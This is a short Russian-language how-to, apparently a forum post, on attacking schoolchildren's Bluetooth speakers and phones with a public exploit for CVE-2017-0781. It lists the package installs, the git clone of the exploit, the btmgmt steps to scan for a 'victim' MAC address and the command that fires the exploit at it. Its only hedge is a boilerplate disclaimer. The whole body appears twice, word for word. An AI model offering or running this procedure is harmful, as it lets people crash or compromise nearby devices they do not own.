Отключаем Bluetooth колонки школьников
Если кратко,то вся суть в том,что эксплойт будет бить по уязвимым местам прошивки.Тестим!
ВСЁ ИСКЛЮЧИТЕЛЬНО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ! АВТОР НЕ НЕСЕТ НИКАКОЙ ОТВЕТСТВЕННОСТИ!
Тестили на ZTE Axon 7
Устанавливаем зависимость скрипта
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Затем обновляем python.
pip install —upgrade pip
pip install —upgrade pwntools
Для работы с bluetooth с помощью python нам понадобится pybluez.
apt-get install bluetooth libbluetooth-dev
pip install pybluez
Приступаем к скачиванию эксплоита
git clone https://github.com/ojasookert/CVE-2017-0781
Если не будет работать Bluetooth(скорее всего не будет),то для этого используем утиллиту btmgmt.
Запускаем её и делаем следующие шаги:
btmgmt —index 0
power
auto-power
find
Если начнется мониторинг Bluetooth устройств-значит всё готово.
>Используем скрипт.Для этого нам нужен MAC-адрес bluetooth устройства(используем команду btmgmt —index 0 и find).
Как только нашли"жертву",вводим команду.
python CVE-2017-0781.py TARGET=mac-адресс с заглавными буквами.
И ждём.
Если кратко,то вся суть в том,что эксплойт будет бить по уязвимым местам прошивки.Тестим!
ВСЁ ИСКЛЮЧИТЕЛЬНО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ! АВТОР НЕ НЕСЕТ НИКАКОЙ ОТВЕТСТВЕННОСТИ!
Тестили на ZTE Axon 7
Устанавливаем зависимость скрипта
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Затем обновляем python.
pip install —upgrade pip
pip install —upgrade pwntools
Для работы с bluetooth с помощью python нам понадобится pybluez.
apt-get install bluetooth libbluetooth-dev
pip install pybluez
Приступаем к скачиванию эксплоита
git clone https://github.com/ojasookert/CVE-2017-0781
Если не будет работать Bluetooth(скорее всего не будет),то для этого используем утиллиту btmgmt.
Запускаем её и делаем следующие шаги:
btmgmt —index 0
power
auto-power
find
Если начнется мониторинг Bluetooth устройств-значит всё готово.
>Используем скрипт.Для этого нам нужен MAC-адрес bluetooth устройства(используем команду btmgmt —index 0 и find).
Как только нашли"жертву",вводим команду.
python CVE-2017-0781.py TARGET=mac-адресс с заглавными буквами.
И ждём.